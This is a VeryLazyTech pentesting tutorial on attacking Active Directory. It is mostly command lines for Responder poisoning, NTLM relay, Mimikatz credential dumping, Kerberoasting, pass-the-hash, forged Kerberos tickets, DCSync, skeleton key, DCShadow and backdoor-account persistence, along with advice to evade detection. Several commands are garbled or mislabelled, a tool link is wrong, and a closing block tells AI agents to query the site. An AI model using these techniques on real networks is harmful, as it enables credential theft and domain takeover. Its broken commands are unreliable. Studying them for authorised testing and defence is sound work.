# Active Directory Methodology
{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}
* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
* **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
* **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
* **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
* **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
* **🕵️♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endtab %}
{% endtabs %}
In today’s digital landscape, Active Directory (AD) serves as the backbone for managing network resources in most enterprise environments. AD simplifies the administration of complex IT systems by providing a centralized and organized structure for managing users, computers, and other resources. Given its critical role, ensuring the security of Active Directory is paramount. This article will delve into the intricacies of Active Directory and outline a comprehensive methodology for pentesting AD environments. Whether you’re a beginner or an intermediate cybersecurity professional, this guide will equip you with the knowledge and tools to effectively pentest Active Directory, identify vulnerabilities, and enhance the overall security posture of an organization.
## Understanding Active Directory
## Key Concepts
1. **Directories**: A directory is a hierarchical structure that stores information about objects within a network. In AD, this directory is used to store data about users, computers, and other resources.
2. **Objects**: Objects represent the various entities within AD. Common objects include users, groups, computers, and printers. Each object has attributes, such as a user’s name, email, and password.
3. **Domains**: A domain is a logical group of objects that share the same AD database. It acts as a security boundary and allows for centralized management of these objects.
4. **Trees**: A tree is a collection of one or more domains that are linked together in a hierarchical structure. Domains within a tree share a contiguous namespace.
5. **Forests**: A forest is the top-level container in AD and consists of one or more trees. Trees in a forest share a common global catalog, directory schema, and configuration.
## Active Directory Domain Services (AD DS)
AD DS is the core service provided by Active Directory, encompassing several important functionalities:
* **Domain Services**: Provides authentication, authorization, and directory services.
* **Certificate Services**: Issues and manages digital certificates for secure communication.
* **Lightweight Directory Services**: Offers a simplified version of AD DS for applications that do not require the full functionality.
* **Directory Federation Services**: Enables single sign-on (SSO) capabilities across organizational boundaries.
* **Rights Management**: Protects sensitive data through encryption and policy enforcement.
* **DNS Service**: Integrates with AD to provide name resolution services.
## Pentesting Active Directory: Methodology and Techniques
## Reconnaissance Without Credentials or Sessions
Before diving into the core pentesting activities, understanding the environment through passive reconnaissance is crucial. Tools like **Nmap** can be used to scan for open ports and services. Additionally, **NetBIOS** and **DNS** enumeration can provide valuable insights into the AD structure and available hosts.
### Commands:
```
nmap -sP
nmap -p 88,135,139,389,445,636,3268,3269,3389 -sV -O
nbtscan
nslookup -type=SRV _ldap._tcp.dc._msdcs.
```
* [Nmap](https://nmap.org/)
* nbtscan
## User Enumeration
User enumeration can be achieved using tools like **ldapsearch** or **enum4linux**. These tools exploit LDAP and SMB protocols to gather information about users and groups.
### Commands:
```
ldapsearch -x -h -b "dc=example,dc=com" "(objectclass=user)"
enum4linux -U
```
* ldapsearch
* enum4linux
## LLMNR/NBT-NS Poisoning
LLMNR and NBT-NS poisoning are techniques used to capture and relay authentication requests. Tools like **Responder** can be employed to listen for these requests and capture hashes, which can then be used for further attacks.
### Commands:
```
sudo responder -I
```
* [Responder](https://github.com/SpiderLabs/Responder)
## NTLM Relay
NTLM relay attacks involve capturing NTLM hashes and relaying them to another service to gain unauthorized access. **NTLMRelayX** is a powerful tool for performing such attacks.
### Commands:
```
sudo ntlmrelayx.py -tf targets.txt -smb2support
```
* [NTLMRelayX](https://github.com/dirkjanm/mitm6)
## Credential Theft
Credential theft can be performed using tools like **Mimikatz** to extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory.
### Commands:
```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
```
* [Mimikatz](https://github.com/gentilkiwi/mimikatz)
## Enumerating Active Directory with Credentials or Sessions
Once credentials are obtained, tools like **BloodHound** can be used to map out the AD environment, identifying relationships and potential attack paths.
### Commands:
```
SharpHound.exe -c All
```
* [BloodHound](https://github.com/BloodHoundAD/BloodHound)
## Kerberoasting
Kerberoasting involves requesting service tickets for SPNs (Service Principal Names) and then cracking the tickets offline to obtain plaintext passwords. Tools like **Rubeus** are commonly used for this technique.
### Commands:
```
Rubeus.exe kerberoast
```
* [Rubeus](https://github.com/GhostPack/Rubeus)
## Remote Connections (RDP, SSH, FTP, Win-RM)
Exploiting remote connections involves using tools like **Metasploit** or **Cobalt Strike** to gain access through services like RDP, SSH, FTP, and Win-RM.
### Commands:
```
msfconsole
use exploit/windows/rdp/rdp_login
set RHOSTS
set USERNAME
set PASSWORD
run
```
* [Metasploit](https://www.metasploit.com/)
## Current Session Tickets
Analyzing current session tickets can help identify active sessions that can be hijacked or abused for lateral movement.
### Commands:
```
klist sessions
```
## Looking for Credentials in Computer Shares
Scanning shared folders for stored credentials can uncover plaintext passwords or scripts containing sensitive information. Tools like **SharpHound** can automate this process.
### Commands:
```
SharpHound.exe -c Shares
```
* [SharpHound](https://github.com/BloodHoundAD/SharpHound)
## Specific Exploits
### CVE-2021–1675 (PrintNightmare)
PrintNightmare is an exploit that leverages vulnerabilities in the Print Spooler service. Tools like **PrintNightmare** exploit this to gain elevated privileges.
### Commands:
```
PrintNightmare.exe
```
* [PrintNightmare](https://github.com/cube0x0/CVE-2021-1675)
### CVE-2021–34527 (PrintNightmare)
This is another variant of the PrintNightmare vulnerability. Proper patch management and disabling the Print Spooler service on critical servers can mitigate this risk.
### Commands:
```
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
```
## Step-by-Step Guides for Key Pentesting Techniques
## Privilege Escalation on Active Directory with Privileged Credentials/Session
1. **Identify vulnerable paths** using tools like BloodHound.
```
SharpHound.exe -c All
```
**2. Exploit the path** by performing techniques like token impersonation or service abuse.
```
mimikatz.exe "privilege::debug" "token::elevate" "exit"
```
**3. Verify access** by attempting to access restricted resources.
```
dir \\\c$
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
```
**3. Execute the command** `sekurlsa::logonpasswords` to extract hashes.
* **Store the hashes** securely for further use.
## Pass the Hash
1. **Obtain the NTLM hash** of the target account.
2. **Use the hash** with tools like Mimikatz or Pass-the-Hash Toolkit to authenticate without the plaintext password.
```
mimikatz.exe "privilege::debug" "sekurlsa::pth /user: /domain: /ntlm: /run:cmd.exe" "exit"
```
## Over Pass the Hash/Pass the Key
1. **Extract the Kerberos key** using tools like Mimikatz.
```
mimikatz.exe "privilege::debug" "sekurlsa::ekeys" "exit"
```
**2. Use the key** to request a Kerberos ticket and authenticate.
```
mimikatz.exe "kerberos::ptt "
```
## Pass the Ticket
1. **Extract the Kerberos ticket** using Mimikatz.
```
mimikatz.exe "kerberos::list" "kerberos::ptt " "exit"
```
**2. Inject the ticket** into the current session using Mimikatz.
## Credentials Reuse
1. **Identify reused credentials** across different services.
2. **Authenticate** using the obtained credentials on other services.
## MSSQL Abuse & Trusted Links
1. **Identify MSSQL servers** within the network.
```
sqlcmd -L
```
**2. Exploit trusted links** to execute commands or retrieve data.
```
sqlcmd -S -U -P
```
## Unconstrained Delegation
1. **Identify accounts** with unconstrained delegation.
```
Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
```
**2. Abuse the delegation** by impersonating the account.
```
mimikatz.exe "kerberos::golden /domain: /sid: /target: /rc4: /user: /service: /target:" "exit"
```
## Constrained Delegation
1. **Identify services** allowed to delegate.
```
Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne $null} -Properties msDS-AllowedToDelegateTo
```
**Exploit the delegation** by compromising the service account.
## Resource-based Constrained Delegation
1. **Identify resource-based delegation** settings.
```
Get-ADComputer -Filter {msDS-AllowedToActOnBehalfOfOtherIdentity -ne $null} -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
```
**2. Exploit the settings** to gain elevated access.
## ACLs Abuse
1. **Enumerate ACLs** using tools like BloodHound.
```
SharpHound.exe -c All
```
**2. Modify ACLs** to grant additional permissions.
```
Invoke-ACLpwn -Domain -Principal -AddFullControl
```
## Printer Spooler Service Abuse
1. **Exploit the Print Spooler service** using known vulnerabilities.
2. **Gain elevated privileges** by exploiting the service.
```
PrintNightmare.exe
```
## Third-Party Sessions Abuse
1. **Identify active third-party sessions**.
```
klist sessions
```
**2. Hijack the sessions** to gain unauthorized access.
## LAPS
1. **Retrieve LAPS passwords** stored in AD.
```
Get-ADComputer -Filter * -Property "ms-MCS-AdmPwd" | Select-Object Name, "ms-MCS-AdmPwd"
```
**2. Use the passwords** to gain access to local administrator accounts.
## Certificate Theft
1. **Identify certificates** stored in AD.
```
certutil -store -user My
```
**2. Extract the certificates** using tools like Certify.
```
Certify.exe find /type:domain
```
## Certificate Templates Abuse
1. **Enumerate certificate templates**.
```
certutil -TCAInfo
```
**2. Abuse misconfigured templates** to obtain elevated privileges.
```
Certify.exe request /ca: /template:
```
## Post-Exploitation with High Privilege Account
1. **Dump domain credentials** using tools like DCSync.
```
mimikatz.exe "lsadump::dcsync /domain: /user:" "exit"
```
**2. Escalate privileges** by creating new accounts or modifying group memberships.
```
net user /add
net group "Domain Admins" /add
```
## Dumping Domain Credentials
1. **Run DCSync** using Mimikatz.
```
mimikatz.exe "lsadump::dcsync /domain: /user:" "exit"
```
**2. Store the dumped credentials** securely.
## Privilege Escalation as Persistence
1. **Maintain access** by creating backdoor accounts.
```
net user /add
```
**2. Ensure persistence** by modifying security descriptors.
```
Set-ACL -Path "AD:" -ACLObject $acl
```
## Silver Ticket
1. **Create a Silver Ticket** using the service account hash.
```
mimikatz.exe "kerberos::golden /domain: /sid: /target: /rc4: /user: /service: /target:" "exit"
```
**2. Authenticate** to the service without communicating with the DC.
## Golden Ticket
1. **Extract the KRBTGT account hash**.
```
mimikatz.exe "lsadump::dcsync /domain: /user:krbtgt" "exit"
```
**2. Create a Golden Ticket** to gain domain admin privileges.
```
mimikatz.exe "kerberos::golden /user: /domain: /sid: /krbtgt: /id: /groups:" "exit"
```
## Diamond Ticket
1. **Craft a Diamond Ticket** with special privileges.
```
mimikatz.exe "kerberos::golden /user: /domain: /sid: /krbtgt: /id: /groups: /extra:" "exit"
```
**2. Use the ticket** for specific operations within the network.
## Certificates Account Persistence
1. **Abuse certificate templates** to maintain persistence.
```
Certify.exe request /ca: /template:
```
**2. Ensure continued access** by re-issuing certificates.
```
Certify.exe renew /id:
```
## Certificates Domain Persistence
1. **Modify domain certificates** to maintain elevated access.
2. **Ensure persistent access** by renewing certificates periodically.
```
Certify.exe renew /id:
```
## AdminSDHolder Group
1. **Modify AdminSDHolder group** settings.
```
Set-ADObject -Identity "CN=AdminSDHolder,CN=System,DC=,DC=com" -Replace @{adminCount=1}
```
**2. Maintain elevated privileges** by ensuring changes propagate.
```
Set-ADUser -Identity -Replace @{adminCount=1}
```
## DSRM Credentials
1. **Retrieve DSRM credentials** from the domain controller.
```
ntdsutil "set dsrm password" "reset password on server " "quit"
```
**2. Use the credentials** to access the DC in Directory Services Restore Mode.
## ACL Persistence
1. **Modify ACLs** to maintain access.
```
Invoke-ACLpwn -Domain -Principal -AddFullControl
```
**2. Ensure persistence** by securing changes against removal.
## Security Descriptors
1. **Analyze security descriptors** for misconfigurations.
```
Get-ACL -Path "AD:"
```
**2. Exploit the misconfigurations** to escalate privileges.
```
Set-ACL -Path "AD:" -ACLObject $acl
```
## Skeleton Key
1. **Deploy a Skeleton Key** on the domain controller.
```
mimikatz.exe "privilege::debug" "misc::skeleton" "exit"
```
**2. Use the master password** to authenticate any account.
## Custom SSP
1. **Install a custom Security Support Provider**.
2. **Use the SSP** to capture or manipulate authentication processes.
## DCShadow
1. **Register a rogue DC** using DCShadow.
```
mimikatz.exe "privilege::debug" "lsadump::dcshadow /push" "exit"
```
**2. Push changes** to the AD database to manipulate objects and permissions.
```
mimikatz.exe "privilege::debug" "lsadump::dcshadow /update" "exit"
```
## LAPS Persistence
1. **Utilize LAPS settings** to maintain access.
```
Get-ADComputer -Filter * -Property "ms-MCS-AdmPwd" | Select-Object Name, "ms-MCS-AdmPwd"
```
**2. Ensure persistence** by periodically updating and retrieving passwords.
## Forest Privilege Escalation — Domain Trusts
1. **Identify inter-domain trusts**.
```
Get-ADTrust -Filter *
```
**Exploit trust relationships** to escalate privileges across the forest.
## Tips for Beginners
## Common Mistakes to Avoid
* **Skipping Reconnaissance**: Thorough recon is crucial for understanding the environment.
* **Ignoring Patch Management**: Ensure the environment is up-to-date with patches.
* **Overlooking Privilege Escalation Paths**: Use tools like BloodHound to identify and exploit all possible paths.
## Challenges and Solutions
* **Complexity of AD Environments**: Break down the environment into smaller segments and analyze each thoroughly.
* **Detection by Security Systems**: Use stealthy techniques and tools that minimize detection.
* **Lack of Documentation**: Document each step meticulously to understand the process and findings better.
Pentesting Active Directory is a multifaceted task that requires a deep understanding of AD structures and services, as well as a methodical approach to identifying and exploiting vulnerabilities. By following the comprehensive methodology outlined in this article, you can systematically uncover weaknesses, elevate privileges, and ultimately enhance the security of AD environments. As you gain experience, continue to refine your techniques and stay abreast of new vulnerabilities and exploitation methods. Pentesting AD is not just about finding flaws but also about contributing to the security and resilience of the IT infrastructure.
Ensuring the security of Active Directory is critical for the overall security of an organization’s IT environment. By conducting thorough pentests and addressing identified vulnerabilities, organizations can protect their valuable assets and maintain a robust security posture.
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.verylazytech.com/windows/images-and-media.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.